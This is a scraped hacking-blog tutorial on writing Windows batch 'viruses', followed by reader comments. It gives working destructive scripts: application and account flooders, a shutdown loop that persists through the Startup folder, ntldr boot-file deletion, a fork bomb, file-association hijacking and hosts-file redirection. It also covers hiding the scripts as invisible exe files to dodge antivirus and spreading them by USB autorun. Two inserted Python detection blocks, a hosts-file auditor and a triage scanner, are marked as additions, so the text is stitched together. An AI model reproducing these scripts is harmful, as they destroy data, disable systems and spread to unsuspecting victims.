Batch Files - The Art of Creating Viruses
8/8/13 Batch Files - the art of creating viruses| Ethical Hacking Tutorials | How to hack
www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html 1/8
Explore Hacking - the dark side of technology // WE REGRET TO INFORM THAT ALL TUTORIAL IMAGES HAVE BEEN ACCIDENTALLY DELETED //
Batch Files - the art of creating viruses
Posted by Aneesh M. Makker at 1:23 AM / Categories: malicious, viruses, windows /
I could just give you the codes to paste in notepad and ask you to save the files with the extension .bat, and
your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of
batch files clear and developing the approach to code your own viruses.
What are Batch Files?
Let's begin with a simple example. Open your command prompt and change your current directory
to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter folder 'x', then make a folder 'y' inside folder 'x'.
Now delete the folder 'x'.
Let's do the same thing another way. Copy these three commands into notepad and save the file
as anything.bat
Now just double click on this batch file and the same work will be done. You will get a folder 'x' on
your desktop and a folder 'y' in it. This means the three commands executed line by line when we ran the
batch file.
So a batch file is simply a text file containing a series of commands which are executed
automatically line by line when the batch file is run.
What can batch viruses do?
They can be used to delete Windows files, format data, steal information, irritate the victim, consume CPU
resources to affect performance, disable firewalls, open ports, modify or destroy the registry, and for many
more purposes.
Now let's start with simple codes. Just copy the code to notepad and save it as anything.bat (I
mean anything you wish, but the extension must be bat, and save it as 'all files' instead of text files).
Note: Type 'help' in the command prompt to learn about some basic commands; to learn how to use
a particular command, type 'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code, when executed, will repeatedly open different applications like paint, notepad and command prompt,
irritating the victim and of course affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that generates a positive number randomly. So this code would
start creating folders whose names can be any random number.
3. User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating Windows user accounts whose names could be any random numbers.
3. Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two
commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note: Files in the Startup folder are started automatically when Windows starts. You should put the first two
lines of code in every virus code so that it would copy itself into the Startup folder. The Startup folder path in
Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Every time the victim starts the computer, the batch file in the Startup folder would run and shut down the
computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting
the batch file from the Startup folder.
4. Deleting boot files
Go to the C drive in Win XP, Tools->Folder Options->View
Now uncheck the option 'Hide operating system files' and check the option 'Show hidden files and folders'.
Click Apply.
Now you can see the operating system files. There is a file 'ntldr', which is the boot loader used to boot
Windows.
Let's make a batch file to delete this file from the victim's computer, and Windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute, hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file, the system will not reboot and a normal victim would definitely install
Windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of
Windows. It will just hang Windows.
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype; for example, extension ‘exe’ is associated with filetype ‘exefile’.
To see them, just enter the command ‘assoc’ in the command prompt.
The above code changes the association of some extensions to filetype ‘anything’ (meaning you can write
anything), which obviously doesn’t exist. So all exe (paint, games, command prompt and many
more), jpeg, png and mpeg files wouldn’t open properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website in it
with an IP in front of it. By doing this, we make the web browser take us to the host located at that IP when
that website name is entered. I mean the request to resolve the IP of the website is not sent to the Domain
Name Server (DNS) if the name of the website is in the hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command
prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with the IP address and website of your choice. You can
take/redirect the victim to any host located at a specific IP when he tries to log on to a specific website, or you
can simply block any website by entering its name and any invalid IP address.
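Because the hosts file is consulted before DNS, auditing it is a quick integrity check. The following is an added example, not code from the original article: it parses hosts-file text and reports every mapping for a name other than localhost. The function names, the allow-list and the sample entries are constructed for illustration.

```python
import ipaddress

EXPECTED_NAMES = {"localhost"}  # names a stock hosts file may map

def parse_hosts(text):
    """Yield (line_no, address, hostname) for every mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()  # drop comment, split columns
        for name in fields[1:]:
            yield line_no, fields[0], name.lower()

def audit_hosts(text, expected=EXPECTED_NAMES):
    """Return (line_no, hostname, address, reason) for unexpected overrides."""
    findings = []
    for line_no, address, name in parse_hosts(text):
        if name in expected:
            continue
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            reason = "invalid address: name cannot be reached"
        else:
            if ip.is_loopback or ip.is_unspecified:
                reason = "points at the local machine: name is blocked"
            else:
                reason = "fixed address: DNS is never asked for this name"
        findings.append((line_no, name, address, reason))
    return findings

def header_missing(text):
    """True when no comment line survives, as after an overwrite with '>'."""
    return not any(l.lstrip().startswith("#") for l in text.splitlines())

# Constructed sample: stock-style entries plus three override entries.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
203.0.113.10    www.example.com
0.0.0.0         update.example.net
999.1.1.1       mail.example.org
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
    print("header missing:", header_missing(SAMPLE_HOSTS))
```

On a live system the text would be read from c:\windows\system32\drivers\etc\hosts; a file with no comment header and a single mapping is consistent with the overwrite performed by the `>` redirection shown above.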
Viruses we just coded
Note: Most batch viruses are simply undetectable by any antiviruses
Tip: Coding good viruses just depends on the DOS commands you know and the logic you use.
Limitations of Batch Viruses -:
1. Victim can easily read the commands by opening the batch file in notepad.
2. The command prompt screen pops up; it alerts the victim and he can stop it.
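Limitation 1 is also what makes these scripts easy to triage: the commands are plain text, so a handful of patterns covers every behaviour listed in this article. The following is an added example, not code from the original article; the rule names, the regular expressions and the two sample scripts are constructed for illustration.

```python
import re

# One rule per behaviour described in the article; names are constructed.
RULES = [
    ("startup-folder copy", re.compile(r"\bcopy\b.*\\Start Menu\\Programs\\Startup", re.I)),
    ("hosts file write", re.compile(r'>{1,2}\s*"?[^"\n]*\\drivers\\etc\\hosts', re.I)),
    ("file association change", re.compile(r"^\s*assoc\s+\.\w+\s*=", re.I)),
    ("boot loader tampering", re.compile(r"\b(attrib|del|erase)\b.*\bntldr\b", re.I)),
    ("self-piping script", re.compile(r"%0\s*\|\s*%0")),
    ("account creation", re.compile(r"\bnet\s+user\b.*/add\b", re.I)),
    ("forced shutdown", re.compile(r"\bshutdown\b.*[-/]s\b", re.I)),
]
LABEL = re.compile(r"^\s*:(\w+)")
GOTO = re.compile(r"^\s*goto\s+:?(\w+)", re.I)

def triage(script_text):
    """Return (line_no, rule_name) findings, in line order, for batch text."""
    findings, labels = [], set()
    for line_no, line in enumerate(script_text.splitlines(), start=1):
        label = LABEL.match(line)
        if label:
            labels.add(label.group(1).lower())
        jump = GOTO.match(line)
        # A goto to a label already seen jumps backwards, i.e. forms a loop.
        if jump and jump.group(1).lower() in labels:
            findings.append((line_no, "backward goto loop"))
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((line_no, name))
    return findings

# Constructed samples: one loop taken from the article, one harmless script.
ACCOUNT_LOOP = "@echo off\n:x\nnet user %random% /add\ngoto x\n"
BENIGN = "@echo off\nmd backup\ncopy report.txt backup\n"

if __name__ == "__main__":
    print(triage(ACCOUNT_LOOP))
    print(triage(BENIGN))
```

The same rules can be run over .bat and .cmd files found in Startup folders or on removable drives; they only read text and never execute the script.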
To overcome these limitations, we need to convert these batch files into executable files, that is, exe
files.
Download this Batch To Exe converter from here.
After running the converter, open the batch file virus, save it as an exe file, set visibility mode 'Invisible
application', then just click on the compile button.
You can use other options as per your requirement.
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim plugs in the pen drive, the autorun.inf will launch anything.bat and the commands in the batch
file virus will execute.

20 comments:

Jesse Posted at: January 13, 2011 at 1:46 PM
haha I remember doing the NTLDR removal trick on a buddy of mine like 3 years ago, he was like, "umm,
dude... my computer won't boot up. What do I do?" I replied with, "You get a really big elephant and get it
to step on your computer." :P

Divyam Makker Posted at: February 8, 2011 at 11:30 AM
I've Got Another Nice idea to make these batch files undetectable...
Google "batch file to exe converter" it converts your batch file to .exe software and no anti-virus detects it
as virus !! \m/
;Divyam

Aneesh M. Makker Posted at: February 8, 2011 at 8:32 PM
I have provided the same thing in the article. I think you didn't read the full article. :)

bongs Posted at: February 22, 2011 at 3:40 AM
im having a problem changing the directory to desktop...if i open the command prompt and type "cd
desktop" it says the system cannot find the path specified

Aneesh M. Makker Posted at: February 22, 2011 at 4:10 AM
In windows XP you are by default at one directory above desktop, but not in windows 7. So give full path
cd C:\users\account_name\desktop

deathprogrammmer Posted at: March 6, 2011 at 7:26 PM
EXCELLENT compilation!!

Anonymous Posted at: March 24, 2011 at 9:33 PM
DNS poisoning is not working ..After creating .bat files when i run them they did not run and the others
which run gives the problem that the application has failed to initialize properly(0x0000142).click ok to
terminate..
plzz sir help wat is the problem????

Anonymous Posted at: June 8, 2011 at 12:07 AM
I had deleted ntldr. what to do now to get it back and run my pc? I don't want to format it. Plz help me
Plz help

Anonymous Posted at: July 2, 2011 at 8:55 AM
If u delete ur ntldr. then first copy this file from any other windows system. Then keep this in usb. In ur
system boot any ( I prefer ubuntu) linux live cd. Dont install that. Just boot from live cd. When u see ubuntu
desktop . U can find ur partitions of windows there. then find ur correct folder in c drive. paste ntldr and
reboot system. Remove linux cd. You can see ur old windows.

Anonymous Posted at: July 6, 2011 at 5:52 AM
autorun is not working plz help..

Anonymous Posted at: January 19, 2012 at 11:39 AM
nyc

Anonymous Posted at: February 3, 2012 at 3:33 PM
Very nice website, keep up with the good work man
It will be very nice if you wrote a topic about the way antiviruses work, you know signatures and that kind
of stuff, and if you know some ways to trick them

Anonymous Posted at: February 28, 2012 at 9:16 AM
spreading of virus is not working ????????

Anonymous Posted at: March 8, 2012 at 7:41 AM
Autorun is not working!!!

Anonymous Posted at: July 31, 2012 at 11:51 AM
hello...i love this website helped me alot with everything...when i write in notepad lets say start(which open
cmd)and i save it as all files with the extension .batch...and i want to open the file it says that i must
choose a program from a list.can you please help me?i would appreciate it alot

Lokesh Daiya Posted at: October 12, 2012 at 12:56 AM
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
both command not working neither in bat file nor cmd
and also i try for windows 7 using
copy anything.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
it gives that command has syntax error
but cant success

Anonymous Posted at: October 14, 2012 at 9:32 AM
Nice compilation of codes ^^

anugrah balakrishnan Posted at: January 2, 2013 at 2:53 AM
can you tell me how to eat up our hard drives memory space??:)

Anonymous Posted at: January 2, 2013 at 7:17 PM
Hello, I wrote and ran the Extension Changer virus (double clicked by mistake) and as you can assume,
all my files were screwed. I managed to boot up in safe mode and change everything except for the
executables. I did that by typing assoc in safe mode's cmd and then I found all of the file extensions
affected and wrote down the correct ones. Then I changed them with the following: assoc
.filetype=.file_extension. This worked for everything except my executables. Please help me, and sorry for
writing so much. I just want to be sure that I gave enough info.

Anonymous Posted at: January 4, 2013 at 11:32 AM
Ok So If I am putting the file in a pen drive do i have to convert it and save it as an .exe file?
Copyright 2010. Explore Hacking all rights reserved.